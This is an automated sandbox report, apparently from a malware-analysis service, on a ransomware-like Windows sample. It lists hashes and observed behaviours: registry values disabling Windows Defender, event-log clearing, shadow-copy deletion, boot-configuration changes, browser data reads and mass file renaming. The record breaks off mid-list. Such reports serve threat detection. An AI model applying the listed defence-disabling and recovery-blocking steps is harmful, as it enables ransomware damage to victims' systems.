Analysis
-
max time kernel
13s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 15:04
Static task
static1
Behavioral task
behavioral1
Sample
3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe
-
Size
3.4MB
-
MD5
3e3c64d90fb826c80e45d9f8791f76fe
-
SHA1
c7c893ef8d3550c773b3523f7c35a827cb65cc5f
-
SHA256
de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf
-
SHA512
ad2cc2abe25800e09c2c34a8943fc5698f28b59e59fb3d89c1993666a75cec42d119bc858c4fdc5114c5ad7b2416e1479811e3047a47c679d72360a536299115
-
SSDEEP
49152:i2cDtPjVrb/TVvO90dL3BmAFd4A64nsfJurbOysDrVyOYF1w86FmCKenPr8bg11I:i2yj7nO7Dpy/Zi4JJOgQ
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4252 wevtutil.exe 1544 wevtutil.exe 3572 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2052 bcdedit.exe 4392 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsStoreLogo.scale-200.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-32.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-black_scale-125.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\sending.gif 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24_altform-fullcolor.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\ImmersiveControl_Slider_Click_Sound.wma 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_nxAKc6E0Hlg0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ppd.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_tMKTnOTamY00.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\localhost.crt 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-200_contrast-white.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\27.jpg 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\GetRegister.wvx.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_JWD5nZAn6q40.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-400.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-150.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_UQQDTzkhlBs0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_BiPInamDEDE0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-16_contrast-white.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_altform-unplated_contrast-black.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FilePdf32x32.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleAppStoreLogo.scale-125.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\6px.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Square71x71Logo.scale-100.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailMediumTile.scale-125.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_9UBs8-BaWE00.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@3x.png.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_a6mZCMSfHi40.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_X_t_x29gf3o0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-100_contrast-white.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailBadge.scale-150.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_dpX0rji4pmI0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_8DwBqLx4tv80.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare71x71Logo.scale-200_contrast-white.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_LLYR0tAChR80.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_R9alouYbacM0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-96_altform-lightunplated.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_yVxrBJ3pWdA0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Riblet.eftx.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_6c62Z6QI2MY0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Grace-ul-oob.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_vYVARZKsdcY0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\Movie-TVStoreLogo.scale-200_contrast-black.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_nXMV04FlsIA0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\glib.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_uKqn5BaA6H40.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.winmd 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-256_altform-unplated.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\id\msipc.dll.mui.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX__23V3zO5BhA0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_contrast-white.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-30_altform-lightunplated.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageLargeTile.scale-200.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-125.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\s_radio_unselected_18.svg.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_5a2Njmj9uS00.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\30.jpg 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-100.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_mBoVvqUE_E40.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\jaccess.jar.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_R0kGwNVHzrA0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ppd.xrm-ms.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_0Sdz74xW1ow0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\AppxSignature.p7x 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-unplated_contrast-black.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_b0njiReWfLw0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\jpeg_fx.md.6vd22ZL8GK2dqJkmhVl-7L0zuxWm6F-Ux-M23QGvohX_Fs5rwrqtE2M0.mhkwl 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-125_contrast-black.png 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4352 sc.exe 4720 sc.exe 752 sc.exe 2604 sc.exe 3848 sc.exe 3888 sc.exe 4780 sc.exe 2828 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3964 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 228 powershell.exe 228 powershell.exe 1956 powershell.exe 1956 powershell.exe 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 4252 wevtutil.exe Token: SeBackupPrivilege 4252 wevtutil.exe Token: SeSecurityPrivilege 1544 wevtutil.exe Token: SeBackupPrivilege 1544 wevtutil.exe Token: SeSecurityPrivilege 3572 wevtutil.exe Token: SeBackupPrivilege 3572 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1872 wmic.exe Token: SeSecurityPrivilege 1872 wmic.exe Token: SeTakeOwnershipPrivilege 1872 wmic.exe Token: SeLoadDriverPrivilege 1872 wmic.exe Token: SeSystemProfilePrivilege 1872 wmic.exe Token: SeSystemtimePrivilege 1872 wmic.exe Token: SeProfSingleProcessPrivilege 1872 wmic.exe Token: SeIncBasePriorityPrivilege 1872 wmic.exe Token: SeCreatePagefilePrivilege 1872 wmic.exe Token: SeBackupPrivilege 1872 wmic.exe Token: SeRestorePrivilege 1872 wmic.exe Token: SeShutdownPrivilege 1872 wmic.exe Token: SeDebugPrivilege 1872 wmic.exe Token: SeSystemEnvironmentPrivilege 1872 wmic.exe Token: SeRemoteShutdownPrivilege 1872 wmic.exe Token: SeUndockPrivilege 1872 wmic.exe Token: SeManageVolumePrivilege 1872 wmic.exe Token: 33 1872 wmic.exe Token: 34 1872 wmic.exe Token: 35 1872 wmic.exe Token: 36 1872 wmic.exe Token: SeIncreaseQuotaPrivilege 2960 wmic.exe Token: SeSecurityPrivilege 2960 wmic.exe Token: SeTakeOwnershipPrivilege 2960 wmic.exe Token: SeLoadDriverPrivilege 2960 wmic.exe Token: SeSystemProfilePrivilege 2960 wmic.exe Token: SeSystemtimePrivilege 2960 wmic.exe Token: SeProfSingleProcessPrivilege 2960 wmic.exe Token: SeIncBasePriorityPrivilege 2960 wmic.exe Token: SeCreatePagefilePrivilege 2960 wmic.exe Token: SeBackupPrivilege 2960 wmic.exe Token: SeRestorePrivilege 2960 wmic.exe Token: SeShutdownPrivilege 2960 wmic.exe Token: SeDebugPrivilege 2960 wmic.exe Token: SeSystemEnvironmentPrivilege 2960 wmic.exe Token: SeRemoteShutdownPrivilege 2960 wmic.exe Token: SeUndockPrivilege 2960 wmic.exe Token: SeManageVolumePrivilege 2960 wmic.exe Token: 33 2960 wmic.exe Token: 34 2960 wmic.exe Token: 35 2960 wmic.exe Token: 36 2960 wmic.exe Token: SeIncreaseQuotaPrivilege 2960 wmic.exe Token: SeSecurityPrivilege 2960 wmic.exe Token: SeTakeOwnershipPrivilege 2960 wmic.exe Token: SeLoadDriverPrivilege 2960 wmic.exe Token: SeSystemProfilePrivilege 2960 wmic.exe Token: SeSystemtimePrivilege 2960 wmic.exe Token: SeProfSingleProcessPrivilege 2960 wmic.exe Token: SeIncBasePriorityPrivilege 2960 wmic.exe Token: SeCreatePagefilePrivilege 2960 wmic.exe Token: SeBackupPrivilege 2960 wmic.exe Token: SeRestorePrivilege 2960 wmic.exe Token: SeShutdownPrivilege 2960 wmic.exe Token: SeDebugPrivilege 2960 wmic.exe Token: SeSystemEnvironmentPrivilege 2960 wmic.exe Token: SeRemoteShutdownPrivilege 2960 wmic.exe Token: SeUndockPrivilege 2960 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1668 wrote to memory of 5076 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 86 PID 1668 wrote to memory of 5076 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 86 PID 5076 wrote to memory of 836 5076 net.exe 89 PID 5076 wrote to memory of 836 5076 net.exe 89 PID 1668 wrote to memory of 1676 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 90 PID 1668 wrote to memory of 1676 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 90 PID 1676 wrote to memory of 4224 1676 net.exe 92 PID 1676 wrote to memory of 4224 1676 net.exe 92 PID 1668 wrote to memory of 1536 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 93 PID 1668 wrote to memory of 1536 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 93 PID 1536 wrote to memory of 1844 1536 net.exe 96 PID 1536 wrote to memory of 1844 1536 net.exe 96 PID 1668 wrote to memory of 4912 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 97 PID 1668 wrote to memory of 4912 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 97 PID 4912 wrote to memory of 4964 4912 net.exe 100 PID 4912 wrote to memory of 4964 4912 net.exe 100 PID 1668 wrote to memory of 4164 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 101 PID 1668 wrote to memory of 4164 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 101 PID 4164 wrote to memory of 3060 4164 net.exe 103 PID 4164 wrote to memory of 3060 4164 net.exe 103 PID 1668 wrote to memory of 3852 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 104 PID 1668 wrote to memory of 3852 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 104 PID 3852 wrote to memory of 3064 3852 net.exe 106 PID 3852 wrote to memory of 3064 3852 net.exe 106 PID 1668 wrote to memory of 2928 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 107 PID 1668 wrote to memory of 2928 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 107 PID 2928 wrote to memory of 5012 2928 net.exe 109 PID 2928 wrote to memory of 5012 2928 net.exe 109 PID 1668 wrote to memory of 3356 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 110 PID 1668 wrote to memory of 3356 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 110 PID 3356 wrote to memory of 3496 3356 net.exe 112 PID 3356 wrote to memory of 3496 3356 net.exe 112 PID 1668 wrote to memory of 3888 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 113 PID 1668 wrote to memory of 3888 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 113 PID 1668 wrote to memory of 4780 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 115 PID 1668 wrote to memory of 4780 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 115 PID 1668 wrote to memory of 2828 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 117 PID 1668 wrote to memory of 2828 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 117 PID 1668 wrote to memory of 4352 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 119 PID 1668 wrote to memory of 4352 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 119 PID 1668 wrote to memory of 4720 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 121 PID 1668 wrote to memory of 4720 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 121 PID 1668 wrote to memory of 752 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 123 PID 1668 wrote to memory of 752 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 123 PID 1668 wrote to memory of 2604 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 125 PID 1668 wrote to memory of 2604 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 125 PID 1668 wrote to memory of 3848 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 127 PID 1668 wrote to memory of 3848 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 127 PID 1668 wrote to memory of 2320 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 129 PID 1668 wrote to memory of 2320 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 129 PID 1668 wrote to memory of 1808 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 131 PID 1668 wrote to memory of 1808 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 131 PID 1668 wrote to memory of 3272 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 133 PID 1668 wrote to memory of 3272 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 133 PID 1668 wrote to memory of 4424 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 135 PID 1668 wrote to memory of 4424 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 135 PID 1668 wrote to memory of 1944 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 137 PID 1668 wrote to memory of 1944 1668 3e3c64d90fb826c80e45d9f8791f76fe_JaffaCakes118.exe 137 PID 1668 wrote to memory of 2304 1668 